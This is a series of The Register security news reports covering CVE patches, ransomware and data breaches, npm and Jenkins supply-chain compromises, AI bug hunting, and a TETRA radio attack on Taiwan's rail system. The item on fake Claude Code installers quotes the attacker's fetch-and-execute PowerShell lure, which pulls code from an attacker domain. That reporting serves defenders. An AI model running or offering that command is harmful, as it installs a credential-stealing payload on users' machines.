Microsoft released fixes for 137 CVEs on Tuesday, none of which are known to have been targeted by attackers. But the news is not all good as Redmond rated a whopping 30 flaws as critical, with 14 earning a 9.0 or higher CVSS severity rating, including one perfect 10. Plus, everyone who celebrates the monthly patchapalooza event received validation for what we all suspected last month: Yes, Redmond (and everyone else, for that matter) is using AI to find a ton more bugs than ever before. And that means a lot more work for all the folks applying and testing the patches. “This month's release sits on the larger side of a hotpatch month, and we expect releases to continue trending larger for some time,” Tom Gallagher, VP of engineering at Microsoft Security Response Center, said in a note on this month's Patch Tuesday. Microsoft also said its secret-until-now AI bug hunting system, codenamed MDASH, found 16 of the vulnerabilities addressed in this month’s release. Redmond additionally announced it is making the tool available to a limited number of customers in private preview, along the lines of Anthropic’s Mythos and Project Glasswing. In other words: no break for Microsoft admins this May Patch Tuesday. Let’s take a look at some of the nastiest/most-interesting bugs that also received some of the highest CVSS ratings this month, coming in hot at 9.8 and 9.9. First up: CVE-2026-41096. This one is a critical, 9.8-rated Windows DNS Client remote code execution (RCE) flaw, and while Redmond says exploitation is “unlikely,” we’d suggest patching it ASAP. It’s due to a heap-based buffer overflow, and no authentication or user interaction is needed to exploit it (it's done by sending a specially crafted DNS response to a vulnerable system), potentially leading to memory corruption and RCE. “Since the DNS Client runs on virtually every Windows machine, the attack surface is enormous,” Zero Day Initiative bug hunting boss Dustin Childs warned. 
“An attacker with a position to influence DNS responses (MitM, rogue server) could achieve unauthenticated RCE across your enterprise.” Plus, it could happen across a ton of enterprise systems very rapidly, Jack Bicer, Action1 vulnerability research director, told The Register. “This CVE requires immediate attention,” he said. “Successful attacks may lead to widespread endpoint compromise, ransomware deployment, credential harvesting, and operational disruption across corporate networks.” Another especially bad bug, CVE-2026-42898 in Microsoft Dynamics 365 on-premises systems, achieved a near-perfect 9.9 CVSS rating and also leads to RCE. Any authenticated user can trigger this vuln - it doesn’t require admin or other elevated privileges. As Redmond explains: “An attacker with the required permissions could modify the saved state of a process session in Dynamics CRM and trigger the system to process that data, which could result in the server unintentionally executing malicious code.” Since exploitation could lead to a scope change, meaning the bug can affect systems beyond the vulnerable component, it’s a pretty serious risk to enterprises and should be prioritized. “Scope changes are pretty rare, so if you’re running Dynamics 365 On-Prem, definitely test and deploy this patch quickly,” Childs said. The second of two 9.8-rated bugs is CVE-2026-41089. It’s a stack-based buffer overflow in Windows Netlogon that allows an unauthenticated, remote attacker to execute code on vulnerable machines by sending a specially crafted network request to a Windows server acting as a domain controller. As Childs points out, the fact attackers can exploit this flaw without credentials or user interaction makes it wormable. “This is the highest-impact bug that requires immediate patching: a compromised domain controller is a compromised domain,” he added. 
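One rough way to act on ratings like these is to sort by exploitability rather than raw CVSS alone. A minimal triage sketch over the three headline bugs above; the exposure flags are our reading of the descriptions, not Microsoft's machine-readable metadata:

```python
# The three headline bugs above, flagged by whether exploitation
# needs authentication (per the descriptions in this article).
cves = [
    {"id": "CVE-2026-41096", "cvss": 9.8, "unauth": True},   # Windows DNS Client RCE
    {"id": "CVE-2026-42898", "cvss": 9.9, "unauth": False},  # Dynamics 365 on-prem RCE
    {"id": "CVE-2026-41089", "cvss": 9.8, "unauth": True},   # Netlogon RCE, wormable
]

def triage(entries):
    """Unauthenticated-remote bugs first, then by CVSS descending."""
    return sorted(entries, key=lambda c: (not c["unauth"], -c["cvss"]))

print([c["id"] for c in triage(cves)])
```

Note this simple key ties the two 9.8s; a real scheme would add further keys such as wormability and asset criticality, which is why Childs singles out Netlogon as the one needing immediate patching.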
The silver lining this month for defenders is that the single CVE earning a perfect 10.0 CVSS rating is in Azure DevOps, and doesn’t require users to fix anything. CVE-2026-42826 is an information disclosure vulnerability in the DevOps toolchain that “has already been fully mitigated by Microsoft,” according to Redmond. “There is no action for users of this service to take. The purpose of this CVE is to provide further transparency.” ®
Categories: News

Foxconn confirms cyberattack after ransomware crew claims it stole confidential Apple, Nvidia files

The Register - Tue, 12/05/2026 - 23:02
Foxconn, a critical supplier for major hardware companies like Apple and Nvidia, on Tuesday confirmed a cyberattack affecting its North American operations after the Nitrogen ransomware gang listed the electronics manufacturer on its data leak site. “Some of Foxconn's factories in North America suffered a cyberattack,” a Foxconn spokesperson told The Register. “The cybersecurity team immediately activated the response mechanism and implemented multiple operational measures to ensure the continuity of production and delivery. The affected factories are currently resuming normal production.” Nitrogen ransomware criminals on Monday claimed to have breached the Taiwan-based company and stolen 8 TB of data comprising more than 11 million files. The miscreants say the leaks include confidential instructions, internal project documentation, and technical drawings related to projects at Intel, Apple, Google, Dell, and Nvidia, among others. Foxconn declined to confirm that these - or any - customers’ information was hoovered up in the digital intrusion. Nitrogen, which has been around since 2023, is believed to be one of the various ransomware offshoots that borrowed code from the leaked Conti 2 builder. And, in what may be very bad news for its latest victim, even paying the ransom demand may not guarantee recovery of encrypted files. In February, Coveware researchers warned that a programming error prevents the gang's decryptor from recovering victims' files, so paying up is futile. The finding specifically concerns the group's malware that targets VMware ESXi. This isn’t the first time Foxconn has been targeted by ransomware gangs. In 2024, LockBit claimed to have infected Foxsemicon Integrated Technology, a semiconductor equipment manufacturer within the Foxconn Technology Group. The same criminal crew also hit a Foxconn subsidiary in Mexico in 2022. ®
Categories: News

US bank reports itself after slinging customer data at 'unauthorized AI app'

The Register - Tue, 12/05/2026 - 15:50
A US commercial bank just tattled on itself to the Securities and Exchange Commission (SEC) for plugging a bunch of customer data into an unauthorized AI application. Community Bank, which operates in southwestern Pennsylvania, Ohio, and West Virginia, filed an 8-K with the regulator on Monday, saying it launched an investigation into the internal cockup, which remains ongoing. It felt compelled to submit the filing "due to the volume and sensitive nature of the non-public information." This included customer names, dates of birth, and Social Security numbers, but the filing provided no further detail about the incident. Community Bank did not specify what this "unauthorized AI-based software application" was or how it was used. However, SSNs are generally categorized in the US among the most sensitive data organizations can store on behalf of customers, and their disclosure is restricted under several federal and state laws. One possibility is that the data was entered into a generative AI tool outside the bank's approved systems. If so, that could raise questions about whether the information was transmitted to a third-party provider and how it may have been retained or processed. The Register asked Community Bank for more details and will update this story if it responds. The bank confirmed that it suffered no operational impact and customers were not prevented from accessing their accounts or payment services as a result. "The company is evaluating the customer data that was affected and is conducting notifications as required by applicable federal and state laws and regulatory guidance," Community Bank stated in its cybersecurity disclosure. "The company has been, and continues to be, in communication with relevant banking and financial regulators regarding the incident." 
It also promised to continue its remediation efforts, take action to prevent future failures, and gave the "we're committed to protecting customers' data" line that always goes down so well. ®
Categories: News

Cache-poisoning caper turns TanStack npm packages toxic

The Register - Tue, 12/05/2026 - 13:00
An attacker has published 84 malicious versions of official TanStack npm packages, with the impact including credential theft, self-propagation, and complete disk wipe of an infected host. The attack is part of a wave across npm and PyPI, continuing the Mini Shai-Hulud campaign. Supply chain security company Socket reports that other compromised packages include the OpenSearch client, Mistral AI, UiPath, and Guardrails AI. Malicious npm packages for TanStack, an open source application stack, were published between 19:20 and 19:26 UTC on May 11. The attack was detected and reported within 30 minutes by StepSecurity, triggering incident response and npm deprecation. GitHub published a security advisory at 21:30 UTC, including a list of affected packages. TanStack founder Tanner Linsley published a postmortem describing how the attacker used a malicious commit on a fork to create a pull request on the TanStack repository, causing scripts to auto-run and build the malware. This poisoned the GitHub Actions cache in what Linsley said is a variant of a known GitHub Actions vulnerability discovered in 2024. The malware then extracted the npm OpenID Connect (OIDC) token, used for trusted npm publishing, from runner memory using the same code used to compromise tj-actions in an attack last year. No TanStack maintainers were compromised. StepSecurity has a detailed analysis of the attack, noting that the payload “reads files from over 100 hardcoded paths” including those that may contain cloud credentials, SSH (secure shell) keys, developer tool configuration files, crypto wallets, VPN configurations, messaging credentials, and shell history. Shell history may contain tokens and passwords pasted into the terminal. Security researcher Nicholas Carlini warned the payload “installs a dead-man's switch… as a system user service.” The service checks whether a stolen GitHub token has been revoked and, if it has, runs a command to wipe the local disk completely. 
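Shell history is one of the easier exposures to audit after the fact. A minimal sketch that flags token-shaped strings in a history file; the patterns below are a hypothetical starting point (the `ghp_` and `AKIA` prefixes are real GitHub and AWS formats), not the payload's actual path list:

```python
import re

# Rough patterns for credentials that commonly leak into shell history.
TOKEN_PATTERNS = [
    ("github_pat", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),       # classic GitHub PAT
    ("aws_access_key", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),      # AWS access key ID
    ("bearer_header", re.compile(r"Authorization:\s*Bearer\s+\S+")),
]

def scan_history(text: str) -> list[tuple[int, str]]:
    """Return (line_number, pattern_name) for each suspicious history line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in TOKEN_PATTERNS:
            if pattern.search(line):
                findings.append((lineno, name))
    return findings

history = (
    "ls -la\n"
    "curl -H 'Authorization: Bearer abc123' https://api.example.com\n"
    "export AWS_KEY=AKIAIOSFODNN7EXAMPLE\n"
)
print(scan_history(history))
```

Anything flagged should be rotated regardless of whether compromise is confirmed; absence of hits proves nothing, since the payload reads far more than history files.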
Socket’s write-up includes recommended actions such as rotating all secrets on any affected system. GitHub’s advisory suggests “any developer or CI environment that ran npm install, pnpm install, or yarn install against an affected version on 2026-05-11 should be considered compromised.” The Mistral AI compromise has also been reported on GitHub, and at the time of writing, the Mistral AI project is quarantined on PyPI. This attack is still evolving and will likely have a far-reaching impact. It confirms again that running everyday commands like npm install is unsafe, that for all their efforts major package repositories including npm and PyPI are still not secure, and that software development is now best done in isolated, ephemeral environments. ®
Categories: News

Apple, Google drag cross-platform texting into the encrypted age

The Register - Tue, 12/05/2026 - 10:46
Apple and Google have taken a big step toward securing cross-platform texting, ending years of messages bouncing around in glorified plaintext. Apple announced this week that encrypted Rich Communication Services (RCS) messaging is rolling out in beta for iPhone users running iOS 26.5 and Android users on the latest version of Google Messages. The feature works across supported carriers and adds end-to-end encryption to cross-platform chats that were still taking the scenic route through carrier-era messaging infrastructure. Users will know it's enabled when a lock icon appears in RCS conversations. Apple says E2EE RCS messages cannot be read while traveling between devices, bringing Android-to-iPhone chats closer to the protections offered by WhatsApp and Signal. The move lands as other platforms head in the opposite direction. Earlier this month, Meta confirmed it was backing away from parts of its encryption rollout for Instagram DMs, telling The Register that "very few" people actually used the feature and suggesting privacy-minded users head over to WhatsApp instead. Apple, meanwhile, appears content to lean harder into the privacy angle, finally plugging one of the more obvious holes in modern messaging security. That gap has been hanging around for years. While iMessage chats between Apple devices were already encrypted, conversations involving Android phones could fall back to SMS or unencrypted RCS, depending on carrier support. Google had offered encrypted RCS chats inside Google Messages for years, but only when both sides used Google's ecosystem. Apple joining the party means cross-platform RCS encryption is finally starting to span the two largest mobile ecosystems. The rollout is still marked as beta, and carrier support varies by region, so not everyone will get encrypted chats immediately. UK availability remains unclear for now, as none of the major UK networks currently appear on Apple's published compatibility lists for the feature. 
Still, after two decades of the mobile industry insisting that interoperability and security could not coexist, cross-platform texting may finally be catching up with the rest of modern messaging. ®
Categories: News

Japan’s PM orders cybersecurity review to stop Mythos going full CyberZilla

The Register - Tue, 12/05/2026 - 06:40
Japan’s prime minister Sanae Takaichi has ordered a review of government cybersecurity strategy, citing the arrival of Anthropic’s bug-hunting model Mythos as a moment that makes it necessary to order a cabinet-level project. In a Tuesday cabinet meeting, the PM instructed cybersecurity minister Hisashi Matsumoto to devise measures to check the state of government systems to determine whether it’s possible to detect and fix vulnerabilities, and to develop a plan to ensure critical infrastructure operators can do likewise. Japan’s leader ordered the checks because she feels Mythos and similar frontier models may be misused, and that attacks on infrastructure may therefore increase in speed and scale – perhaps even exponentially. Over the last couple of years, cybersecurity vendors and researchers have often pointed out that AI models make it possible to find flaws and automate attacks. When Anthropic debuted Mythos in early April, the notion that AI has the potential to vastly complicate the security landscape went mainstream. Many regulators around the world have issued guidance to point out that now is the perfect time to revisit and improve security strategies and capabilities, because Mythos and other AI models mean defenses are going to be tested like never before. India’s securities regulator went a step further by ordering a security review at the organizations it oversees. And now Japan’s leader has decided the matter is of sufficient importance that her office needs to weigh in and set new policy to ensure AI doesn’t go on a destructive rampage through Japanese infrastructure. Whether Takaichi’s urgency is needed is open to debate. Some researchers have said that while Mythos can find bugs at speed, it doesn’t find flaws humans can’t detect with their naked brains. Others suggest Mythos is not vastly better at finding bugs than open source models that pre-date it and are publicly available – unlike Mythos, which is restricted to certain users. 
Others have all but dismissed Mythos as a marketing stunt. ®
Categories: News

Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline

The Register - Tue, 12/05/2026 - 00:16
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and, for many, Advanced Placement testing. As of Saturday, the parent company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters defaced about 330 Canvas school login portals, also exploiting the same Free-for-Teacher vulnerability, and that caused the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools including Harvard, Columbia, Rutgers, Georgetown, and Stanford universities. 
After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Categories: News

Cookie thieves caught stealing dev secrets via fake Claude Code installers

The Register - Mon, 11/05/2026 - 21:21
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer but substitutes an attacker-controlled command. In this case, the legitimate command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaces the destination host, yielding “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers, exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attack also abuses the IElevator2 COM interface. This is Chromium’s elevation service interface used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. 
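The lure pattern itself is cheap to screen for. A minimal sketch that extracts the host from an `irm … | iex` one-liner and checks it against an allowlist; the allowlist is hypothetical, and real deployments would hook PowerShell script-block logging rather than scan strings:

```python
import re

# Hosts you expect install one-liners to come from (hypothetical allowlist).
ALLOWED_HOSTS = {"claude.ai"}

# Matches `irm <target> | iex` / `Invoke-RestMethod <target> | iex`,
# with or without an http(s):// scheme on the target.
IRM_IEX = re.compile(
    r"(?:irm|Invoke-RestMethod)\s+(?:https?://)?([^\s/|]+)[^|]*\|\s*iex",
    re.IGNORECASE,
)

def check_oneliner(cmd: str) -> str:
    """Classify a download-and-execute one-liner by its destination host."""
    m = IRM_IEX.search(cmd)
    if not m:
        return "not-irm-iex"
    host = m.group(1).lower()
    return "allowed" if host in ALLOWED_HOSTS else f"suspicious:{host}"

print(check_oneliner("irm https://claude.ai/install.ps1 | iex"))
print(check_oneliner("irm events.msft23.com | iex"))
```

This only catches the copy-paste stage: the campaign's swapped-in host trips it, while the genuine installer command passes.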
The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native ABE helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper names its exfiltration pipe using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, but falls back to the legacy IElevator interface on the Elevation Service if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. 
The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” This split matters for defenders, the research team wrote, because “behavioral rule sets that look at the native PE in isolation will see nothing actionable. Detection has to land at the COM call and at the PowerShell layer.” ®
Categories: News

Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator

The Register - Mon, 11/05/2026 - 17:30
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. 
“The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he noted that their descriptions and explanations were well done. Mythos can do good work, in other words, but it’s not the ground-breaking, game-changing AI model Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.”

cURL code is no stranger to AI

To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz testers since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” All that prior AI scrutiny, in other words, makes cURL a great testbed for whether Mythos can really find more than the average model. 
As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. Stenberg isn’t an AI doomer when it comes to the technology’s ability to improve software, though. Yes, he closed the cURL bug bounty earlier this year due to an influx of sloppy, useless bug reports, but a few months before that closure he noted that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.”

Mythos isn’t any more creative than its creators

Both older AI models and security-focused tools like Mythos share a common limitation, as far as Stenberg is concerned: They’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it "an amazingly successful marketing stunt for sure" in his blog post. In an email to The Register, Stenberg conceded that it may be possible for AI models to discover new, novel types of vulnerabilities, but he’s still not convinced they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code.
“Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, like the valuable AI-assisted reports made to the cURL bug bounty program before its closure amid a flood of AI garbage, getting real value out of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said he hopes he’ll eventually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding his breath for the promised access to materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
Categories: News

BWH Hotels guests warned after reservation data checks out with cybercrooks

The Register - Mon, 11/05/2026 - 15:34
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data. The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025. BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. The company confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved. The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked if this was related to information we were sent in March about BWH Hotels customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday. "Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards." "We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage.
Navigate to sites directly rather than clicking links." ®

Checkmarx tackles another TeamPCP intrusion as Jenkins plugin sabotaged

The Register - Mon, 11/05/2026 - 13:11
Checkmarx’s software engineers are still working to remove a malicious version of the code security outfit's Jenkins plugin after detecting an unauthorized upload over the weekend. The company updated customers on Saturday, May 9, after discovering that a modified version of its AST Scanner, which is used for security scans in Jenkins CI pipelines, had been made available via the Jenkins Marketplace. “We are aware that a modified version of the Checkmarx Jenkins AST plugin was published to the Jenkins Marketplace,” it said in a statement. “We are in the process of publishing a new version of this plug-in.” Versions published as of May 9, 2026, should not be trusted, it added, before urging all users to check they’re running the correct release (2.0.13-829.vc72453fa_1c16), published on December 17, 2025. Installed on several hundred controllers, the malicious plugin remains available at the time of writing, and appears as the most recent version, although pull requests actioned on Monday morning suggest it will soon be pulled down. “What makes this particularly dangerous for Jenkins users is the trust model at play,” said SOCRadar in its coverage. “The Checkmarx Jenkins plugin is a tool people install specifically to improve the security of their pipelines. “A backdoored version doesn’t just compromise one project; it rides trusted infrastructure into every build pipeline it touches, with access to source code, environment variables, tokens, and whatever secrets the runner can see.” Security engineer Adnan Khan spotted the compromise quickly over the weekend. The crew behind the earlier supply chain attack affecting Checkmarx in April, TeamPCP, defaced the company’s GitHub and published six packages, each with a description alluding to the Shai-Hulud wormable malware.
These packages no longer appear on Checkmarx’s GitHub, but TeamPCP made multiple changes to the AST plugin’s page, renaming it “Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now” and altering the description to claim Checkmarx failed to rotate its secrets. The latest infiltration of Checkmarx’s internals marks the third time TeamPCP has compromised the company’s packages in as many months. As The Register previously reported, the crooks successfully targeted Checkmarx’s AST plugin for GitHub Actions and its KICS static analysis tool back in March, deploying credential-stealing malware. SOCRadar said the latest TeamPCP compromise of the Jenkins plugin suggests either that TeamPCP was telling the truth about Checkmarx’s secrets rotation, or that its members exploited an additional persistence mechanism the security vendor failed to notice during its response to the March intrusion. ®
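The vendor's advice to check you are running a specific known-good release illustrates a general supply-chain defense: verify a downloaded artifact against a digest published out of band before installing it. Here is a minimal Python sketch; the file name, byte contents, and pinned digest are all hypothetical, and nothing below reflects Checkmarx's or Jenkins' actual distribution mechanics.

```python
import hashlib
from pathlib import Path

def verify_artifact(path: Path, expected_sha256: str) -> bool:
    """Return True only if the file's SHA-256 matches the pinned digest."""
    digest = hashlib.sha256(path.read_bytes()).hexdigest()
    return digest == expected_sha256

# Usage: pin the digest of a trusted artifact, then confirm that
# verification passes for it and fails once the bytes are tampered with.
artifact = Path("plugin.hpi")                  # hypothetical plugin file
artifact.write_bytes(b"trusted plugin bytes")  # stand-in for real contents
pinned = hashlib.sha256(b"trusted plugin bytes").hexdigest()
print(verify_artifact(artifact, pinned))       # True

artifact.write_bytes(b"tampered plugin bytes")
print(verify_artifact(artifact, pinned))       # False
```

A digest check only helps if the expected value comes from a channel the attacker does not control, such as a signed release announcement, rather than from the same page serving the download.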

Taiwan's train cyber-trauma reveals a global system that’s coming off the tracks

The Register - Mon, 11/05/2026 - 09:30
OPINION There are three little words to make the heart beat faster in anyone who knows what they mean: critical infrastructure resilience. If you run that infrastructure, or a country dependent on it, you need energy, communication and transport to be impregnable to cyber attacks. This is doubly so if that country is five minutes by incoming missile from an implacable, hyper-competent enemy sworn to invade you. One that is building and equipping its military as fast as it can with this one thing in mind. One with the most invasive and brazen state hacking machinery on the planet. Thus it was a very bad day indeed when Taiwan’s entire bullet train system was disabled for nearly an hour by an unknown attacker. It got even worse when that attacker turned out not to be the implacable and hyper-resourced state actor over the Taiwan Strait, but a university student with a yen for radio and some kit he bought online. On the one hand, it’s good to see the grand tradition of young hackers causing havoc from their bedrooms is in such good repair. On the other, WTRF? The information released by the Taiwanese authorities is scant on details, but enough to be pretty sure what actually happened. It’s bad news not just for Taiwan but for the more than 100 countries that also use the TETRA two-way radio standard involved, often for emergency services. In many cases, it was the default replacement for unencrypted FM two-way radios, adding encryption, flexibility and network security. These were state of the art when TETRA was developed in the 1980s and 1990s — and work as well in 2026 as you might expect. Oops. There have been upgrades and, especially after the 2023 vulnerability disclosures, an accelerated program of making things better. But a lot of the installed base globally is old and lacks over-the-air security updates, and in any case, spending money on new radios normally sits at the bottom of the list for any state or public service organization. Things have to get really bad first.
Perhaps they just have. (North America is the only region where TETRA is uncommon, as it isn’t approved for public service use. This was either acute foresight or the fact that the TE in TETRA, now officially TErrestrial, used to stand for Trans-Europe. The American system, P25, has never, however, been renamed Freedom Frequencies. Now on with the show.) The network vulnerabilities are one side of the story. Our doughty hacker is the other. Reportedly, he didn’t have any TETRA hardware, but a laptop connected to a radio and an ‘SDR filter’. The latter makes little sense; it is far more likely that he had a software defined radio (SDR) called a HackRF. There are plenty of other devices that could have been used, but the HackRF is the weapon of choice for the gung-ho radio nut. SDR is a technique that has completely changed the rules of how to radio. All radios before it had to be entirely or mostly analog, with precision hardware dedicated to whatever job each radio had to do. This hardware can also be looked at as an analog computer, as it can be modelled as a set of mathematical transformations on the received signal. Analog computers have their place, just not in the 21st century. SDR is radio as digital computer. At heart, it has three components: an analog to digital converter to turn the incoming signal into a stream of numbers, very fast processing to do the radio math, and a digital to analog converter to play the results. What you get is triply terrific. Digital processing is perfect; analog processing adds noise and distortion. Nothing is fixed; everything can be re-engineered with new code. And it can be hog-whimperingly cheap. HackRF is all those things and more. It can be configured as a portable touch-screen device. It transmits and receives from DC to daylight. You can pick one up for less than the price of a mid-range mobile. It is open source. It works with all manner of SDR creation tools, utilities and radio packages.
